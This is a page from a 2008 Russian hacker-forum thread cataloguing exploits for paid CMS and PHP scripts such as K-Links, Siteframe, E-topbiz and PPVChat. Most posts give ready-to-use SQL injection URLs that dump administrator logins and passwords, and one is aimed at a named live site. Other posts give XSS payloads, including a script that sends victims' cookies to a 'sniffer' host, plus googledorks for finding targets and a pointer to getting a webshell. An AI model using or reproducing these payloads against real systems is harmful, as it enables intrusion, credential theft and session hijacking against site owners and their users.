Форум АНТИЧАТ
Страница 2 из 6 < 1 2 3 4 5 6 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Обзор уязвимостей в платных CMS (https://forum.antichat.xyz/showthread.php?t=58123)

.Slip 28.03.2008 22:08
Smart-CMS
 
showNewsItem.php

Exploit:
Код:
showNewsItem.php?news_id=-22+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,admin_id,user_name,password)+from+administrator--
Пассы без шифрования
/admin/index.php

chekist 02.04.2008 12:51
тамже
showGallery.php?pagetitle=Gallery&category=1+and+1 =0+union+select+concat(user_name,0x3a,password)+fr om+administrator/*

.Begemot. 14.06.2008 12:47
Pre Job Board (JobSearch.php) Remote SQL Injection Vulnerability
Код HTML:
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+            Pre Job Board (JobSearch.php) Remote SQL Injection Vulnerability        +==--
--==+====================================================================================+==--
                          - dreaming of necessity is reason to comply -


[+] Info:

[~] Bug found by JosS
[~] sys-project[at]hotmail.com
[~] http://www.spanish-hackers.com/
[~] EspSeC & Hack0wn!.

[~] Software: Pre Job Board (payment)
[~] HomePage: http://www.preproject.com/
[~] Exploit: Remote SQL Injection [High]
[~] Vuln file: JobSearch.php

[~] /jobseekers/JobSearch.php (search module)

[+] Exploit:

[~] ' and 1=2 union all select 1,2,3,4,version(),user(),7,8,9,0,1,2,3,4,5/*

* In memory of rgod

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                      JosS                                        +==--
--==+====================================================================================+==--
                                      [+] [The End]

# milw0rm.com [2008-06-14]
milw0rm.com [2008-06-14]

Ded MustD!e 19.06.2008 22:15
Пассивная XSS в ARTUS-master

Уязвимо поле поиска.

Цитата:
"><script>alert()</script>
например тут
Цитата:
http://artus.ru/
:)

baltazar 18.07.2008 13:44
CNCat
XSS:
Уязвимости в add.php(можно как через GET тк и через POST),index.php и search.php

Код:
http://site/add.php?description=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/search.php?q=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/?c=0&o=0%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

n0ne 18.07.2008 17:26
Не уверен, что платная CMS, но тем не менее :)

SQL-inj в Siteframe CMS

В скрипте folder.php, параметре id.

Код:
http://site.com/folder.php?id=[sql]
Боевой пример:

Цитата:
http://www.myfourthirds.com/folder.php?id=370+and(1=2)+union+select+1,2,3,4,5, 6,7,8,concat_ws(0x3a,user_email,user_passwd),10,11 +from+users--

Corwin 02.08.2008 10:52
K-Links Directory SQL-INJECTION, XSS
 
================================================== ==============================
|| K-Links Directory SQL-INJECTION, XSS
================================================== ==============================

Application: K-Links Directory
--------------

Website: http://turn-k.net/k-links
-----------

Version: Platinum (All)
----------

About: Script for starting a profitable link directory website offering full-featured directory of resources/links similar to Yahoo-style search engine. Price 79-169$.
------

Googledork: Powered By K-Links Directory
---------------

Demo: http://klinksdemo.com
--------

Date: 24-07-2008
-------

Description:
---------------
Множественные SQL-Injection. Активные и пассивные XSS.


[ SQL-INJECTION ]

http://host/report/-1[SQL]
http://host/visit.php?id=-1[SQL]
http://host/addreview/-1[SQL]
http://host/refer/-1[SQL]

===>>> Exploit:

http://host/report/-1 union select 1,2,3,concat(a_pass,0x3a,a_user),5,6,7,8,9,1,2,3,4 ,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2 ,3,4,5,6,7,8 from platinum_admins where a_id=1/*


/* Admin Login - http://host/admin

Далее, через Manage Templates получаем веб-шелл. */

[ ACTIVE XSS ]

*) На сайте в поиске вбиваем <script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>

При просмотре администратором поисковых запросов, его cookies уйдут на сторонний ресурс.

*) На любую ссылку можно оставить мнение. После чего это сообщение появится у администратора.

[ PASSIVE XSS :) ]

http://host/index.php?req=login&redirect=&login_message=<scrip t>alert()</script>


Author: Corwin
---------

Contact: corwin88[dog]mail[dot]ru
-----------

p.s. к сожалению не удалось найти скрипты и провести нормальный аудит кода.

Corwin 02.08.2008 10:56
================================================== ==============================
|| Dating 3 PHP Script SQL-INJECTION
================================================== ==============================

Application: E-topbiz Dating 3 PHP Script
------------

Version: All
--------

Website: http://e-topbiz.com/oprema/pages/dating3.php
--------

Demo: http://e-topbiz.com/trafficdemos/dating3
-----

About: Dating 3 is a very powerful top quality dating php script for webmasters who wish to run an online dating site.
------

Date: 01-08-2008
-----

[ VULNERABLE CODE ]

members/mail.php

@Line:

PHP код:
  142:     if($action==inbox) { 
  143:     $result=mysql_query("select * from mail where UserTo ='$username' ORDER BY SentDate DESC") or die ("cant do it"); 


  150:     if($action==veiw) { 
  151:     $result=mysql_query("select * from mail where UserTo='$username' and mail_id=$mail_id") or die ("cant do it"); 


===>>> Exploit:

http://host/members/mail.php?action=veiw&mail_id=-1 union select 1,2,3,concat(username,0x3a,password),5,6,7 from admin/*



Author: Corwin
-------

Contact: corwin88[dog]mail[dot]ru
--------

Corwin 02.08.2008 11:38
============================
|| PPVCHAT ACTIVE XSS
============================

Application: PPVCHAT
------------

Website: http://ppvchat.com/
--------

Version: All
--------

About: Pay-per-view adult video chat software. Price 999$.
------

Googledork: Copyright © 2006 PPVChat.com
-----------

Date: 05-07-2008
-----

Description:
------------
При регистрации новых пользователей/моделей нет фильтрации полей.

===>>> Exploit:

<script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>


Author: Corwin
-------

Contact: corwin88[dog]mail[dot]ru
--------

Corwin 02.08.2008 15:39
================================================== ==============================
|| E-topbiz Payment Processor 2 SQL-INJECTION
================================================== ==============================

Application: E-topbiz Payment Processor 2
------------

Version: 2.0
--------

Website: http://e-topbiz.com/oprema/pages/pproc2.php
--------

Demo: http://e-topbiz.com/trafficdemos/payment2/
-----

About: The payment processor php script allows you to own and operate your very own paypal type payment processor ------ website and to make a percentage OF EACH AND EVERY TRANSACTION that takes place on your site.

Date: 01-08-2008
-----

[ SQL-INJECTION ]

http://host/shop.htm?cid=-1[SQL]

===>>> Exploit:

http://host/shop.htm?cid=-1 union select 1,2,concat(user(),0x3a,version())



Author: Corwin
-------

Contact: corwin88[dog]mail[dot]ru
--------


Время: 00:08
Страница 2 из 6 < 1 2 3 4 5 6 >
Показывать 40 сообщений этой темы на одной странице